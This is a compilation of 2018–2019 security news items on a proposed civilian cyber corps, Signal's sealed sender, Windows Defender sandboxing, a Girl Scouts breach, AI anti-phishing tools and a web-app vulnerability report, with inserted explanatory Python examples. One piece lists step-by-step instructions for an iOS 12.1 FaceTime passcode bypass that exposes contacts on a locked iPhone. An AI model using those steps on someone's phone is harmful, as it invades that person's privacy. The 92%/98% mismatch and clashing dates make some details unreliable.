New America suggests that the Corps would just need a federal budget of $50 million to get started. "This budget would go towards the purchase of devices, training materials, software licenses, and office space." It justifies the budget by noting that NotPetya ransomware outbreak cost FedEx $400 million, and Merck $670 million.

"If a cyber corps is able to prevent just a few of these breaches and/or mitigate their damage and costs," suggests New America, "especially through its relatively cheap supplementary volunteer model, the investment will more than pay itself off in both economic and national security terms."

It is unlikely that a volunteer force will be any more capable than the existing FedEx and Merck security teams -- but collaboration and intelligence sharing between members of the Corps could potentially provide an early warning system. Wenzler is also concerned that the concept could be abused. Firstly, he wonders, "If materials are being provided, would that come in the form of computers and free Internet access and software licenses to security tools? If so, you may find a lot of people signing up just to get these free items, but be unwilling or unable to volunteer the kind of quality services that would be expected."

Secondly, he wonders if the Corps itself would become a target. "What if this corps was given access to a central database or network that connects all the other participants so they could collaborate? Seems like a valuable target for most aggressor nation-states to want to join in and monitor so that they can better understand what they're up against when potentially attacking U.S. organizations."

Overall, the consensus seems to be that New America's proposal is an interesting, but unworkable idea. Carson believes it is aimed at the wrong level of participant. "I don't believe this is realistic as it is a voluntary service," he told SecurityWeek, "and you want to influence the right professionals to participate so it must be focused on seasoned professionals who can cooperate with government officials with a common goal on protecting civilians from cyber-attacks."

"All in all, it's a noble idea," said Wenzler, "but not a particularly useful or clever way to make better use of the limited number of people and the ever-shrinking amount of time they have to contribute their expertise for the betterment of society as a whole. We're already doing that, and efforts like this Cybersecurity Civilian Corps would be better served by supporting the groups and organizations out there who are already fulfilling this purpose."

iOS Lockscreen Bypass Abuses New Group FaceTime Feature
31.10.2019 securityweek

Just hours after Apple announced the availability of a new FaceTime feature in iOS, iPhone enthusiast Jose Rodriguez, known for his YouTube channel videosdebarraquito, found a way to bypass a device’s lockscreen by abusing the newly introduced functionality.

With the release of iOS 12.1, Apple rolled out a new feature called Group FaceTime, which allows users to add other people to their ongoing FaceTime call.

While the feature may be useful for many people, Rodriguez quickly discovered that it can be abused to bypass the passcode on iPhones and gain access to contact information saved on a device.

The hack is easy to carry out and it’s very reliable, unlike other methods discovered by Rodriguez recently, which involved tens of steps and often required multiple attempts to complete.

The attack starts with a phone call to or from the targeted device – Siri can be used to make a phone call to someone in the address book or a specified phone number. If the calling/called device has FaceTime, the hacker can switch the call to FaceTime and then select the “Add Person” option associated with the newly introduced group feature.

The device will prompt the attacker to select someone from the address book. While only contact names are displayed initially, the attacker can use 3D Touch – the feature that allows the device to distinguish between different levels of force being applied to the screen – to obtain additional information for each contact.

In the past years, Rodriguez identified numerous methods to bypass an iPhone’s lockscreen and gain access to contacts and photos stored on a device.

He recently discovered several methods involving Siri and the VoiceOver accessibility feature. Apple has made multiple attempts to patch the bugs after Rodriguez found new variations. The most recent patch came on Tuesday, when Apple released iOS 12.1, but it’s clear that the hacker is very resourceful.

While some of these passcode bypass methods were patched with regular updates, Apple also rolled out iOS updates specifically to address Rodriguez’s hacks.

Signal Unveils New 'Sealed Sender' Feature
31.10.2019 securityweek

Open Whisper Systems on Monday announced that the latest beta version of the Signal messaging app includes a new feature that aims to protect the identity of the sender.

Signal uses end-to-end encryption to protect messages and it avoids storing data such as contacts, conversations, locations, avatars, profile names, and group details. However, current stable versions do rely on the service knowing where a message comes from and where it’s going.

Signal developers hope to further reduce the amount of data accessible to the messaging service with a new feature, named "sealed sender," that removes the service's need to know who the sender is.

The application's developers noted that, today, a Signal client authenticates to the service when it sends a message, so that the service can validate the sender's identity and prevent spoofing. The sender's identity is also what the service's rate limiting and abuse prevention mechanisms key on.

Implementing "sealed sender" therefore meant that Open Whisper Systems had to come up with an alternative for both functions. The first was addressed by having the client periodically fetch a short-lived sender certificate that contains the user's phone number and public identity key and is signed by the service. By including this certificate in sent messages, the receiving client (rather than the service) can check its validity and verify the sender's identity.

As for abuse prevention, Signal developers have decided that an efficient alternative would be to use 96-bit delivery tokens derived by clients from the profile key. The tokens are registered with the service and clients are required to prove knowledge of the token when sending “sealed sender” messages.

“Since knowledge of a user’s profile key is necessary in order to derive that user’s delivery token, this restricts ‘sealed sender’ messages to contacts who are less likely to require rate limits and other abuse protection. Additionally, blocking a user who has access to a profile key will trigger a profile key rotation,” Signal’s Joshua Lund wrote in a blog post.

Users also have the option to allow anyone (i.e., people not in their contact list) to send “sealed sender” messages. However, Signal warned that this increases the risk of abuse.
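The flow described above, as an added example that is not Signal's code: the service issues a short-lived sender certificate, the sender proves knowledge of the recipient's 96-bit delivery token instead of authenticating, the receiver checks the certificate, and blocking a contact rotates the profile key so the token that contact derived stops working. Assumptions in the model: an HMAC under a server secret stands in for the server's certificate signature (so the receiving client calls the service's verifier rather than checking a public key), HMAC-SHA256 truncated to 96 bits stands in for Signal's token derivation, and the payload is relayed opaque because end-to-end encryption is out of scope here.

```python
import hashlib
import hmac
import secrets
import time

# Added example: constructed model of the sealed-sender flow, not Signal's code.
# Assumptions: HMAC under a server secret replaces the server's signature (the
# receiver therefore calls the service's verifier instead of a public key);
# HMAC-SHA256 truncated to 96 bits replaces Signal's token derivation; payloads
# are relayed as-is, with end-to-end encryption out of scope.

CERT_LIFETIME = 24 * 3600          # seconds; the exact lifetime is an assumption


def derive_delivery_token(profile_key: bytes) -> bytes:
    """96-bit delivery token; anyone holding the profile key can derive it."""
    return hmac.new(profile_key, b"delivery-token", hashlib.sha256).digest()[:12]


class Service:
    """Server side: issues sender certificates, stores tokens, relays envelopes."""

    def __init__(self):
        self._signing_key = secrets.token_bytes(32)
        self._tokens = {}          # phone -> registered delivery token
        self.mailbox = {}          # phone -> queued envelopes (sender never recorded)

    @staticmethod
    def _cert_body(phone, identity_key, expires):
        return f"{phone}|{identity_key.hex()}|{expires}".encode()

    def issue_sender_certificate(self, phone, identity_key, now):
        expires = int(now) + CERT_LIFETIME
        body = self._cert_body(phone, identity_key, expires)
        sig = hmac.new(self._signing_key, body, hashlib.sha256).digest()
        return {"phone": phone, "identity_key": identity_key, "expires": expires, "sig": sig}

    def verify_sender_certificate(self, cert, now):
        body = self._cert_body(cert["phone"], cert["identity_key"], cert["expires"])
        expected = hmac.new(self._signing_key, body, hashlib.sha256).digest()
        return hmac.compare_digest(expected, cert["sig"]) and now < cert["expires"]

    def register_delivery_token(self, phone, token):
        self._tokens[phone] = token

    def deliver_sealed(self, recipient, token, envelope):
        """Unauthenticated submission, accepted only with the recipient's current token."""
        registered = self._tokens.get(recipient)
        if registered is None or not hmac.compare_digest(registered, token):
            return False           # abuse control without learning who is sending
        self.mailbox.setdefault(recipient, []).append(envelope)
        return True


class Client:
    def __init__(self, phone, service):
        self.phone, self.service = phone, service
        self.identity_key = secrets.token_bytes(32)   # stands in for the public identity key
        self.profile_key = secrets.token_bytes(32)
        self.contact_profile_keys = {}                # phone -> profile key shared by that contact
        self._cert = None
        service.register_delivery_token(phone, derive_delivery_token(self.profile_key))

    def share_profile_key_with(self, other):
        other.contact_profile_keys[self.phone] = self.profile_key

    def send_sealed(self, recipient, payload, now):
        if self._cert is None or now >= self._cert["expires"]:     # periodic refresh
            self._cert = self.service.issue_sender_certificate(self.phone, self.identity_key, now)
        profile_key = self.contact_profile_keys.get(recipient)
        if profile_key is None:
            return False           # not a contact: the token cannot be derived
        envelope = {"cert": self._cert, "payload": payload}
        return self.service.deliver_sealed(recipient, derive_delivery_token(profile_key), envelope)

    def receive(self, now):
        """(sender phone, payload) for envelopes whose certificate verifies; others are dropped."""
        accepted = []
        for env in self.service.mailbox.pop(self.phone, []):
            if self.service.verify_sender_certificate(env["cert"], now):
                accepted.append((env["cert"]["phone"], env["payload"]))
        return accepted

    def block(self, phone):
        """Blocking rotates the profile key, so the blocked contact's derived token stops working."""
        self.profile_key = secrets.token_bytes(32)
        self.service.register_delivery_token(self.phone, derive_delivery_token(self.profile_key))


def demo():
    svc = Service()
    alice, bob, mallory = (Client(p, svc) for p in ("+15550001", "+15550002", "+15550003"))
    bob.share_profile_key_with(alice)             # Bob is one of Alice's contacts
    now = time.time()
    sent = alice.send_sealed(bob.phone, b"hi", now)
    stranger = mallory.send_sealed(bob.phone, b"spam", now)   # Mallory lacks Bob's profile key
    received = bob.receive(now)
    bob.block(alice.phone)
    after_block = alice.send_sealed(bob.phone, b"again", now)
    return sent, stranger, received, after_block


if __name__ == "__main__":
    print(demo())
```

Run it and the tuple comes back as sent, stranger rejected, one accepted message attributed to Alice's certificate, and Alice's next send rejected after Bob blocks her. Note what the service learns in `deliver_sealed`: only that someone holding Bob's token submitted an envelope, which is exactly the limited abuse signal the blog post describes.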

Once the feature is rolled out to all users, messages will automatically be sent out without giving away the sender’s identity, at least whenever possible. In the meantime, “sealed sender” can be tested by installing the latest beta release.

“These protocol changes are an incremental step, and we are continuing to work on improvements to Signal’s metadata resistance. In particular, additional resistance to traffic correlation via timing attacks and IP addresses are areas of ongoing development,” explained Lund.

Open Whisper Systems has made significant improvements to Signal over the past years, but researchers have also discovered potentially serious security issues in the messaging service, including code execution vulnerabilities, failure to delete messages from devices, and bugs that could have been exploited to alter attachments.

A few hours after Apple released iOS 12.1, a researcher presented a Passcode Bypass issue
31.10.2019 securityaffairs

A few hours after Apple released iOS 12.1 the iPhone bug hunter Jose Rodriguez has found a new passcode bypass issue that could be exploited to see all contacts’ private information on a locked iPhone.
“Jose Rodriguez, a Spanish security researcher, contacted The Hacker News and confirmed that he discovered an iPhone passcode bypass bug in the latest version of its iOS mobile operating system, iOS 12.1, released by Apple today.” reads a post published by THN.

Like the other passcode bypasses the researcher has found, this one is very simple to exploit.

Rodriguez published a video PoC that shows how the passcode bypass works.

The flaw resides in the new feature Group FaceTime that was implemented with iOS 12.1 and that allows users to video chat with up to 32 people simultaneously and supports stickers, video filters, and Animoji/Memoji.
Unlike his earlier bypasses, this one does not depend on the VoiceOver screen reader being enabled on the target iPhone; Siri is only needed to place the call when the attacker cannot ring the device from another phone.

Below is the procedure Rodriguez showed THN:

1. Call the target iPhone from any other iPhone (if you don't know the target's number, ask Siri "who am I", or ask Siri to dial your number digit by digit), or use Siri on the target iPhone itself to place the call.
2. As soon as the call connects, switch to a FaceTime video call from the same screen.
3. In the bottom-right menu select "Add Person."
4. Press the plus icon (+) to open the complete contact list of the targeted iPhone; 3D Touch on a contact reveals more information.

"In a passcode-locked iPhone with latest iOS released today Tuesday, you receive a phone call, or you ask Siri make a phone call (can be digit by digit), and, by changing the call to FaceTime you can access the contact list while adding more people to the Group FaceTime, and by doing 3D Touch on each contact you can see more contact information," Rodriguez told The Hacker News.

Also, it should be noted that since the attack utilizes Apple’s Facetime, the hack would only work if the devices involved in the process are iPhones.

The new passcode bypass works on all current iPhone models, including the latest iPhone X and XS devices, running the latest version of Apple's mobile operating system.
Unfortunately, at the time of writing there is no workaround for the issue.

Rodriguez has recently found other, similar issues in Apple devices: in October he first disclosed a passcode bypass in the newly released iOS 12 that could be exploited to access photos and contacts on a locked iPhone XS, and followed it with a second bypass with the same impact.

Windows Defender is the first antivirus solution that can run in a sandbox
31.10.2019 securityaffairs

Windows Defender, the anti-malware tool built into Windows, can now run its scanning engine in a sandbox.
A sandbox isolates a process from the operating system and from other applications, so even if that process is compromised the rest of the system is unaffected unless the attacker also has a sandbox escape.

Because antivirus and anti-malware tools run with the highest level of privileges in order to scan every part of a computer for malicious code, they have become an attractive target for attackers.

This is probably the first case of an antivirus product sandboxing itself to protect the Windows system in the event that the product is compromised.
In the past, several vulnerabilities were discovered in popular antivirus solutions (ESET, Symantec, AVG, McAfee, Kaspersky, Malwarebytes) that could have been exploited to compromise the host.

Microsoft has decided to add this layer of defense by introducing a sandbox mode to Windows Defender.

Experts pointed out that implementing sandboxing in Windows Defender was not simple, because of the possible impact on system performance.

“Security researchers both inside and outside of Microsoft have previously identified ways that an attacker can take advantage of vulnerabilities in Windows Defender Antivirus’ content parsers that could enable arbitrary code execution.” Microsoft said in a blog post.

“Running Windows Defender Antivirus in a sandbox ensures that in the unlikely event of a compromise, malicious actions are limited to the isolated environment, protecting the rest of the system from harm.”

Google Project Zero researcher Tavis Ormandy, who has found numerous bugs in antivirus products, praised Microsoft's decision to add the sandbox mode.

Tavis Ormandy: "Wow, this is amazing. Congratulations to the team, this is game changing."

Tanmay Ganacharya (Microsoft), 6:39 PM, Oct 26, 2018: "📢 Windows Defender Antivirus can now run in a sandbox! 📢 💥 First complete AV solution to have this capability 💥 This is a direct result of feedback that we received from the security industry. We encourage you to try this feature & give us feedback." https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/

Currently, Windows Defender supports the sandbox on Windows 10 version 1703 or later, but it is being rolled out gradually and users who want it now have to enable it explicitly.

“The ability to gradually deploy this feature was another important design goal. Because we would be enabling this on a wide range of hardware and software configurations, we aimed to have the ability at runtime to decide if and when the sandboxing is enabled. This means that the entire content scanning logic can work both in-proc and out-of-proc, and it can’t make any assumptions about running with high privileges.” continues Microsoft.

“Users can also force the sandboxing implementation to be enabled by setting a machine-wide environment variable (setx /M MP_FORCE_USE_SANDBOX 1) and restarting the machine. This is currently supported on Windows 10, version 1703 or later.”

To enable the feature:

1. Run cmd as administrator.
2. Type setx /M MP_FORCE_USE_SANDBOX 1 and press Enter.
3. Restart the computer.

After the reboot the sandboxed content process appears in Task Manager as MsMpEngCP.exe, running alongside the antimalware service MsMpEng.exe.

Girl Scouts data breach exposed personal information of 2,800 members
31.10.2019 securityaffairs

A Girl Scouts of America branch in California suffered a security breach in which hackers accessed data on 2,800 girls and their families.
Hackers breached the Orange County, Calif. branch of the Girl Scouts of America, potentially exposing personal information for 2,800 members and their families.

According to the Girl Scouts of Orange County, an unknown threat actor gained access to an email account operated by the organization and used it to send messages.


The account was compromised from Sept. 30 to Oct. 1. Girl Scouts of Orange County has notified every member whose data may have been exposed.

In a letter sent to members, Christina Salcido, vice president of mission operations for GSOC, confirmed that the attackers may have accessed names, birth dates, home addresses, insurance policy numbers and health history for some members. "Out of an abundance of caution, we are notifying everyone whose information was in this email account," Salcido added.

According to GSOC, the account had been used in the past to arrange travel for group members, which is why the hackers could reach personal data simply by having access to the mailbox.

Experts warn that the exposed information could be used in social-engineering attacks against the affected families.

GSOC says it will improve the security of the portal used to arrange members' travel and, in response to the incident, has deleted every email containing member data.

AI-Facilitated Product Aims to Stop Spear-Phishing Attacks
30.10.2019 securityweek

Phishing -- from bulk spam phishing to more targeted spear-phishing and business email compromise (BEC) attacks -- is the number one attack vector faced by business today.

According to Wombat, 76% of organizations experienced phishing attacks in 2017. According to Symantec, by the end of 2017 the average user received 16 malicious emails per month. According to the FBI, global BEC losses from October 2013 to December 2016 had reached $5.3 billion -- a figure that Trend Micro believes could expand to $9 billion for 2018 alone.

INKY, founded in 2008 by Dave Baggett and Simon Smith, has today launched a new AI-based anti-phishing product: INKY Phish Fence. The product is designed to recognize phishing emails. It integrates with Office 365 and Google Cloud services. Incoming mail can be marked clean, suspicious or malicious. Such emails can be dropped, quarantined, or delivered with an inserted banner (yellow or red) to warn the user.

"Phishing is the top attack vector in today's threat landscape as criminals can easily access phishing toolkits on the Dark Web. INKY's ability to uniquely detect brand forgery and phishing attacks through the company's anomaly detection algorithms is a welcome approach to solving such a systemic issue," said Mark Bowker, senior analyst at ESG.

INKY combines machine learning algorithms that analyze the content of a message with computer vision techniques that analyze any graphics it carries (such as brand logos) to make its decisions. It also builds a social graph of all employees to understand how likely communication between any two parties is.

INKY builds a profile capturing the writing style, geographical route and other properties of each incoming email. This is compared to existing profiles for each sender, potentially generating the red or yellow warning banner.

It looks for fraudulent emails by using computer vision to analyze brand imagery, looking at shapes, proportions, pixel colors and more. It relies on SPF, where the sending domain publishes it, to detect spoofed domains, and examines WHOIS for further details; WHOIS has become less useful under GDPR but is not entirely irrelevant.

While there are many anti-phishing products available, it is clear that the problem remains unsolved. Analyzing its own repository of phishing emails, INKY found that more than half of phishing emails get through traditional anti-spam filters: 41.57% pass DKIM, 37.93% pass DMARC and 59.25% pass SPF. Email authentication, in other words, tells a filter who sent a message, not whether that sender is trustworthy.
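To make the last point concrete, an added example that is not INKY's code: it reads the Authentication-Results header a receiving mail server stamps on a message (RFC 8601), checks the display name against a brand table and against a known colleague's usual address, and turns the result into the clean / suspicious / malicious verdict that would drive a yellow or red banner. The brand table, the known-sender table, the verdict rules and the four sample messages are assumptions constructed for the demo; two of the samples pass SPF, DKIM and DMARC and are still flagged, because the lookalike domain is genuinely the sender.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Added example, not INKY's code. The brand table, the known-sender table, the
# verdict rules and the sample messages are assumptions constructed for the demo.

BRANDS = {                      # brand word in a display name -> domains allowed to use it
    "paypal": {"paypal.com"},
    "microsoft": {"microsoft.com", "microsoftonline.com"},
}
KNOWN_SENDERS = {               # stand-in for a per-sender profile / social graph
    "jane doe": "jane.doe@example.com",
}
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(pass|fail|softfail|none|neutral|temperror|permerror)\b", re.I)
FAILING = {"fail", "softfail", "permerror"}


def parse_auth_results(msg):
    """{'spf': 'pass', 'dkim': 'none', ...} from the Authentication-Results header."""
    return {m.group(1).lower(): m.group(2).lower()
            for m in AUTH_RE.finditer(msg.get("Authentication-Results", ""))}


def classify(raw):
    """Return (verdict, reasons). A passing SPF/DKIM/DMARC is deliberately not a clean signal."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower()
    auth = parse_auth_results(msg)
    impersonation, weak_auth = [], []
    for brand, allowed in BRANDS.items():            # brand forgery: name says PayPal, domain does not
        if brand in name.lower() and domain not in allowed:
            impersonation.append(f"display name mentions {brand} but sender domain is {domain}")
    expected = KNOWN_SENDERS.get(name.lower())       # colleague impersonation from a new address
    if expected and addr.lower() != expected:
        impersonation.append(f"'{name}' normally writes from {expected}, not {addr}")
    for mech in ("spf", "dkim", "dmarc"):            # outright spoofing of a protected domain
        if auth.get(mech) in FAILING:
            weak_auth.append(f"{mech}={auth[mech]}")
    if impersonation:
        return "malicious", impersonation + weak_auth
    if weak_auth:
        return "suspicious", weak_auth
    return "clean", []


def banner_line(verdict, reasons):
    """Text to prepend to the body; because it is part of the mail it shows in any client."""
    if verdict == "clean":
        return None
    colour = "RED" if verdict == "malicious" else "YELLOW"
    return f"[{colour} BANNER] {verdict}: " + "; ".join(reasons)


# Constructed sample messages; only the headers matter for the checks above.
SAMPLES = {
    "colleague": (
        'From: "Jane Doe" <jane.doe@example.com>\n'
        "Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com;"
        " dkim=pass header.d=example.com; dmarc=pass header.from=example.com\n"
        "Subject: lunch\n\nSee you at noon.\n"),
    "brand_forgery": (
        'From: "PayPal Support" <alerts@paypa1-secure.net>\n'
        "Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=paypa1-secure.net;"
        " dkim=pass header.d=paypa1-secure.net; dmarc=pass header.from=paypa1-secure.net\n"
        "Subject: Verify your account\n\nClick here.\n"),
    "lookalike_colleague": (
        'From: "Jane Doe" <jane.doe@gmail.com>\n'
        "Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=gmail.com;"
        " dkim=pass header.d=gmail.com; dmarc=pass header.from=gmail.com\n"
        "Subject: urgent wire\n\nCan you pay this invoice today?\n"),
    "spoofed_domain": (
        'From: "IT Helpdesk" <it@example.com>\n'
        "Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=example.com;"
        " dkim=none; dmarc=fail header.from=example.com\n"
        "Subject: password reset\n\nReset here.\n"),
}


def run_samples():
    """Verdict per sample; useful as a quick regression check for the rules above."""
    return {name: classify(raw)[0] for name, raw in SAMPLES.items()}
```

The design choice worth noting is the ordering: impersonation signals outrank authentication results, because the brand-forgery and lookalike-colleague samples are fully authenticated for the domain the attacker actually controls. Authentication failures alone only earn a yellow banner, since a legitimate sender with a broken SPF record produces the same headers.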

Last year a new research paper, 'Detecting Credential Spearphishing Attacks in Enterprise Settings', was awarded the Facebook Internet Defense Prize at the 26th USENIX Security Symposium in Vancouver, BC. It proposed a methodology to detect spear-phishing that is specifically targeted and merely contains a link to a malicious URL that probably has a good reputation.

It does not involve machine learning. In fact, the paper states, "With such a small number of known spearphishing instances, standard machine learning approaches seem unlikely to succeed: the training set is too small and the class imbalance too extreme."

INKY founder Dave Baggett doesn't disagree in principle, but argues that INKY Phish Fence shows otherwise in practice.

"We've certainly seen that traditional Bayesian techniques do not work well on phishing emails -- especially spear-phishing emails," he told SecurityWeek. "This is because, as the paper says, these models are entirely built around extracting 'good email' vs 'bad email' signals from the mail; and these signals simply aren't present for many spear-phishing emails. For example," he continued, "spear-phishing emails often don't have a URL, a malware attachment or other easily-identified 'bad mail' property. Likewise, they often do have numerous 'good mail' properties, like being sent from a high-reputation IP (G Suite or O365) or being DKIM-signed."

He believes there are two primary reasons that Phish Fence succeeds against the odds. First, the team uses semi-supervised machine learning techniques that boost the efficacy of machine learning models where only a small amount of labeled data is available. Furthermore, he adds, "For us, training examples aren't just spear-phishing emails, but all emails sent to and from a particular target of impersonation. That's a much larger data set."

The second reason, he continued, "We're not forced to make a binary decision between 'good mail' and 'bad mail' anyway, since we have the 'third way' of communicating exactly what we thought was unusual to the end user by adding a yellow warning banner."

The banner shows up on any endpoint -- and not just Outlook or Gmail -- because it constitutes a modification of the email itself. "While this seems like it would be trivial to do," he said, "there's a long tail of details that make it hard in practice. That's probably why nobody else does it even though it's so helpful for dealing with the cases where a mail is in between 'bad' and 'good'."

Backed by ClearSky Security, Gula Tech Adventures and Blackstone, INKY raised $5.6 million in Series A funding in June 2018. "There is an obvious lack of innovation around detecting and preventing today's sophisticated phishing attacks," said Ron Gula, Founder of Gula Tech Adventures. "With the launch of INKY Phish Fence, enterprises will now be able to detect and prevent against the industry's most common, yet formidable vectors. Investing in this space is incredibly important as the first line of defense against attackers gaining access to sensitive data."

92% of External Web Apps Have Exploitable Security Flaws or Weaknesses: Report
30.10.2019 securityweek

According to new research, 98% of leading companies across the U.S. and Europe are vulnerable to cybercriminals through their web applications. While this figure may seem high, it will surprise neither the companies themselves nor independent security experts.

Most large companies readily admit that they have shadow IT and legacy applications they do not know, and that this at least theoretically makes them vulnerable. It is generally considered to be an acceptable risk.

The purpose of this research from High-Tech Bridge (HTB) is to show that the problem is far bigger and less acceptable than most companies imagine. It was prompted, at least in part, by HTB's experience with one particular U.S. government agency client.

"They told us," HTB founder and CEO Ilia Kolochenko told SecurityWeek, "'We know we have shadow IT -- about 250 applications.'" HTB used its non-intrusive scanning tools and replied, "No, you have 8,000 shadow IT applications." The implication is that this government agency has around 7,750 shadow IT applications that it doesn't know about and isn't monitoring, leaving it exposed to an unquantifiable risk.

For its new research, HTB used its four free non-intrusive scanning products (Discovery, SSLScan, WebScan and Mobile App Scanner) to quantify the vulnerabilities and weaknesses of the FT U.S. 500 companies, and the FT Europe 500 companies. It is important to note that these non-intrusive scans do not detect all vulnerabilities -- only those that are exposed to the internet. But if HTB can see them via the internet, so can hackers.

The figures returned are quite staggering. First the basics. The 500 largest U.S. companies have 293,512 external systems accessible from the internet. 42,549 have a live web application with dynamic content and functionality. The figures for the 500 largest European companies are 112,750 and 22,162. Kolochenko points out that the figures are skewed somewhat by the sheer size of some of the American firms, with the likes of Apple, Google, Facebook and Microsoft each having many thousands of servers and many thousands of applications.

The results do not compare U.S. and European companies. Apart from the size differential there is a culture differential. Europe is conservative while the West Coast in particular is the home of innovation and experimentation. The U.S. and Europe are apples and pears; and the spread of firms chosen was simply to give a geographically dispersed view of the problem.

Nevertheless, these first figures show, according to the report, "a US company has an average of 86.5 applications that can be easily discovered externally and are not protected by 2FA, strong authentication or other security controls aimed to reduce application accessibility to untrusted parties. As for an EU company, there are 46 such applications per company."

HTB grades installations on a score out of 100, mapped to letters from A to F. The research found that 48.1% of U.S. web servers achieve an A grade for their SSL/TLS configuration, but 32.21% get an F; in fact, 7.82% still have the vulnerable and deprecated SSLv3 protocol enabled. In Europe the figures are 62.4% at A, 16.02% at F, and 5.15% with SSLv3 enabled.

The research also examined external indications of compliance with PCI DSS and GDPR to gauge the level of security for the internet-facing applications. For PCI, it shows that only 16.4% of the U.S. web servers have an SSL/TLS configuration compliant with PCI DSS 3.2.1 (and only 14.7% in Europe). The report notes, "a configuration non-compliant with PCI DSS does not necessarily mean poor encryption, but in many cases it does."

On indications of GDPR compliance, 16.2% of the US companies have at least two web applications that permit entry of personally identifiable information (PII) (e.g. via web forms) and run a vulnerable version of SSL/TLS, and/or outdated and vulnerable CMS or other web software. It is only slightly lower in Europe at 15.4%. "Numbers of non-compliant web applications may likely be much higher," comments the report, "but it is impossible to say how many of the outdated and vulnerable websites actually process or store PII without conducting intrusive tests."

You get the picture. The sheer quantity of weaknesses, concerns and vulnerabilities exposed by even the largest companies is far greater than most people would realize. But this is just the beginning. HTB's research also found:

• only 2.94% of U.S. companies achieve an A grade for properly implemented security hardening and configuration of web servers. Most (76.9%) score an F. The scores in Europe are almost identical at 2.98% and 76.9%.

• only 9.1% of U.S. companies have an enabled and properly configured content security policy (CSP), which is used to mitigate XSS and CSRF attacks on the server side. It is worse in Europe at just 4.39%.

• as many as 8% of web applications in the U.S. (15.8% in Europe) use third-party software (CMS, jQuery, SharePoint) that is outdated and contains at least one publicly disclosed vulnerability.

• 94% of all U.S. WordPress installations (99.5% in Europe) have a default admin location not protected by other means such as supplementary .htaccess authentication or IP whitelisting, making authentication attacks (including via compromised plug-ins) much simpler.

• 98.4% of U.S. web applications (98.1% in Europe) have no web application firewall (WAF), or have one configured in too permissive a mode.

• 0.91% of U.S. web applications (0.63% in Europe) provide an exposed web interface to internal ICS/SCADA or IoT systems.

• 27% of U.S. companies (12% of European companies) have at least one external cloud storage (for example, an S3 bucket) accessible from the internet without any authentication. HTB's non-intrusive scanning does not know what the storage contains, but the report comments, "Some files in storages are expressly marked as “internal” pointing out that these cloud resources are probably not intended for public availability."

• 221 U.S. companies have a total of 1,232 vulnerability submissions on Open Bug Bounty -- of which 462 have not been patched. 162 European companies have 625 vulnerability submissions, of which 210 remain unpatched.

• 62% of U.S. companies have at least one website access being sold on the Dark Web (78% of European companies).
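The CSP figure above hinges on what "properly configured" means. The following is an added example (not HTB's scanner, and not the report's grading criteria) that applies a few baseline checks a reviewer would run against a site's Content-Security-Policy header; the sample headers are constructed.

```python
"""Baseline audit of a Content-Security-Policy response header.

Added example, not HTB's scanner. The weakness rules below are this
reviewer's own baseline (assumed), not the report's grading criteria.
"""

HASH_OR_NONCE_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header):
    """Parse "directive src src; directive2 ..." into {directive: [sources]}.

    Per the CSP spec, a repeated directive is ignored: the first one wins.
    """
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name in policy:
            continue  # duplicate directive: browsers keep the first occurrence
        policy[name] = tokens[1:]
    return policy


def _header(headers, name):
    """Case-insensitive lookup of one response header."""
    for key, value in headers.items():
        if key.lower() == name:
            return value
    return None


def audit_csp(headers):
    """Return a list of findings for a response's headers; [] means no baseline issue."""
    csp = _header(headers, "content-security-policy")
    if csp is None:
        if _header(headers, "content-security-policy-report-only") is not None:
            return ["CSP is report-only: nothing is enforced"]
        return ["no Content-Security-Policy header"]

    policy = parse_csp(csp)
    findings = []

    # script-src falls back to default-src when absent; with neither, any script origin is allowed.
    script_src = policy.get("script-src", policy.get("default-src"))
    if script_src is None:
        findings.append("no script-src or default-src: scripts from any origin allowed")
    else:
        srcs = [s.lower() for s in script_src]
        has_nonce_or_hash = any(s.startswith(HASH_OR_NONCE_PREFIXES) for s in srcs)
        # Modern browsers ignore 'unsafe-inline' when a nonce or hash is present, so only
        # flag it when it actually takes effect.
        if "'unsafe-inline'" in srcs and not has_nonce_or_hash:
            findings.append("script-src allows 'unsafe-inline' without nonce/hash: inline XSS not mitigated")
        if "'unsafe-eval'" in srcs:
            findings.append("script-src allows 'unsafe-eval'")
        if "*" in srcs or any(s in ("http:", "https:", "data:") for s in srcs):
            findings.append("script-src includes a wildcard or bare scheme source")

    # object-src also falls back to default-src; an unrestricted value lets plugin content be injected.
    object_src = policy.get("object-src", policy.get("default-src"))
    if object_src is None or "*" in object_src:
        findings.append("object-src effectively unrestricted: set object-src 'none'")

    return findings


# Constructed sample header sets (not captured from any real site).
WEAK_HEADERS = {
    "Content-Security-Policy": "default-src *; script-src * 'unsafe-inline' 'unsafe-eval'",
}
STRONG_HEADERS = {
    "content-security-policy": "default-src 'self'; script-src 'self' 'nonce-abc123'; "
                               "object-src 'none'; base-uri 'self'",
}
REPORT_ONLY_HEADERS = {
    "Content-Security-Policy-Report-Only": "default-src 'self'",
}

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("strong", STRONG_HEADERS),
                        ("report-only", REPORT_ONLY_HEADERS), ("missing", {})):
        print(label, audit_csp(hdrs))
```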

However, knowing the size of the problem is no help to an overworked CISO. He or she is probably already aware that problems exist, although most likely not to this extent. The problem is knowing where to start.

High-Tech Bridge has also launched a new product: Immuniweb AI Discovery. It can locate the problems listed above, but then uses machine learning techniques to relate the problems to HTB's own Big Data compilation of more than 853,783,291 known vulnerabilities and weaknesses in web applications. This data is compiled from all publicly available sources and added to HTB's own research. From this it can return a 'hackability score' and an 'attractive score'.

HTB first finds the problems, and then uses artificial intelligence to tell the company which issues are most easily exploited, and which issues are most likely to be exploited. In effect, it provides the CISO with a risk management-based roadmap for tackling the most critical vulnerabilities in his or her internet-facing infrastructure -- many of which may well have been unknown.

